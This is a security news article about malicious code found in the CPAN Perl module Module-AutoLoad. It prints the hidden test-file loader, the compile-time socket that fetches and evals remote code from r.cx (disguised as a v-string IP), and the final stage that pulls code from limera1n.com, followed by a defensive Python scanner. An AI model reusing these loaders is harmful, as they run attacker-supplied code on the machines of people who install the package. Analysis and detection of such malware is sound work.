News and Threat Analysis

MALICIOUS CODE DETECTED IN ONE OF CPAN'S MODULES

In this pandemic everybody around us is learning or gaining something. It has already been 4 months since any of us have been to the workplaces we had grown so used to. Learning is a great tool for getting ahead of those around you, and learning a powerful language such as Perl is all the more useful if you want to poke at someone's privacy. Perl is one of the languages most used by hackers nowadays, because for them the fun part is scripting rather than working out logic the way programmers do.

When you learn a particular language, you naturally get to know some related open source tools or projects that you can use to deepen your knowledge. For Perl, the open source project to talk about is CPAN, which stands for Comprehensive Perl Archive Network. It is a repository of 194,565 Perl modules in 41,632 distributions. Any user can download and install these Perl modules on their devices as they see fit.

Recently, researchers from the Perl Foundation observed malicious code in a module named Module-AutoLoad, which has been available to users since 2011. It is a module anyone can use in their project to automatically load CPAN modules on the fly, without having to configure the module's dependencies separately. Let's see where the malicious actions in this module actually are.

MALICIOUS CODE INSIDE THE MODULE

The malicious element was found in the file 05_rcx.t inside the package. The code in this file looks something like this:

#!perl

# 10_rcx.t - Test RCX functionality

use Test::More tests => 3;
use strict;
use warnings;

# Start from this test file's own path and swap the file name for
# ../contrib/RCX.pl, so the "test" points at a script outside t/.
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
# Run that script with the same perl binary ($^X) and capture its output;
# the three checks below only look for marker words in that output.
my $try = `$^X $prog`;
ok($try =~ /loaded/, "load");
ok($try =~ /drawn/, "compile");
ok($try =~ /dropped/, "method");

As we can see, the code above leads to the execution of the script ../contrib/RCX.pl, which looks something like this:

#!/usr/bin/perl -w

# Program: RCX.pl
# Purpose: Test RCX Obfuscation Framework

use strict;
use IO::Socket;
# 'use lib' runs at compile time, so this do{} block executes before the
# rest of the script is even parsed: open a socket to port 1 of the host
# named by the literal, read one line from it and eval it as Perl code.
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
use sword;
drop sword;
exit 0;

The literal 82.46.99.88 in the script above is not really an IP address: Perl reads a bare number with more than one dot as a v-string, so it becomes the four characters "R.cX", which is the hostname http://r.cx. That server loads another obfuscated script into the system. This second script is found to establish a connection with another domain, www.limera1n.com, to install an iPhone jailbreak or some kind of rootkit on the system. The obfuscated script:

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE.150B=W<N;&EM97)A,6XN8V]M.C@P(GTB1T54("]I2F%I;$)RH96%K#0HB.V5V86P\)&(^;W(@<F5T=7)N('=A<FXD0'=H:6QE)&([,0}
    if 0; # not running under some shell
use base qw(Exporter);
our @EXPORT=qw(botstrap);
$b->SUPER::expand;
# IP Bait HOP no. 47 : RCX Framework - 2001-0

After unpacking the final code which is then executed is:

print{$b=new IO::Socket::INET"www.limera1n.com:80"}"GET /iJailBreak
";eval<$b>or return warn$@while$b;1
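To triage a distribution for the pattern shown in 05_rcx.t and RCX.pl above (a socket opened at compile time, eval of whatever comes back, and a v-string disguised as an IP address), here is an added Python scanner that is not part of the original article or of Module-AutoLoad. It uses only the RCX.pl text quoted above as a constructed sample; the regexes and rule names are my own.

```python
"""Static triage of Perl test/contrib files for the Module-AutoLoad pattern:
compile-time socket, eval of socket data, and a v-string posing as an IP."""
import re

# Constructed sample: the RCX.pl payload quoted in the article (not fetched).
RCX_PL = r'''#!/usr/bin/perl -w
use strict;
use IO::Socket;
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
use sword;
drop sword;
exit 0;
'''

# A bare numeric literal with two or more dots is a Perl v-string: each
# dotted number becomes the character with that code point.
VSTRING_RE = re.compile(r'(?<![\w$@%.])v?(\d+(?:\.\d+){2,})(?![\w.]*\d)')

def decode_vstring(literal: str) -> str:
    """82.46.99.88 -> 'R.cX' (the hostname r.cx, not an IPv4 address)."""
    return ''.join(chr(int(part)) for part in literal.lstrip('v').split('.'))

SUSPICIOUS = {
    # eval of data read straight from a filehandle/socket: remote code execution
    'eval-from-handle': re.compile(r'\beval\s*<\s*\$\w+\s*>'),
    # a network socket created inside a test or build-time file
    'socket-in-test': re.compile(r'IO::Socket::INET'),
    # code that runs during compilation (use/BEGIN) rather than at runtime
    'compile-time-exec': re.compile(r'\buse\s+lib\s+do\s*\{|\bBEGIN\s*\{'),
    # a test spawning another perl on a file outside t/, as 05_rcx.t does
    'spawns-perl': re.compile(r'`[^`]*\$\^X'),
}

def scan_perl_source(src: str):
    """Return (rule, line_no, detail) tuples for one Perl source file."""
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, rx in SUSPICIOUS.items():
            if rx.search(line):
                findings.append((name, no, line.strip()))
        for m in VSTRING_RE.finditer(line):
            decoded = decode_vstring(m.group(1))
            if decoded.isprintable():  # version v-strings decode to control chars
                findings.append(('vstring-as-host', no, f'{m.group(1)} -> {decoded!r}'))
    return findings

if __name__ == '__main__':
    for f in scan_perl_source(RCX_PL):
        print(*f, sep='\t')
```

Run it over every .t and .pl file of a distribution before installing; `use 5.10.1;` style version literals are ignored because they decode to non-printable characters.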

CONCLUSION

The malicious package described above has been removed from the Perl Authors Upload Server, and the developer's account has been locked by the moderators. The organization also said that this module has not had many downloads. Asked about delivering malicious content through modules, the developer told the organization that the script being executed is non-malicious and that the string iJailBreak, which is then fetched remotely, is just for fun.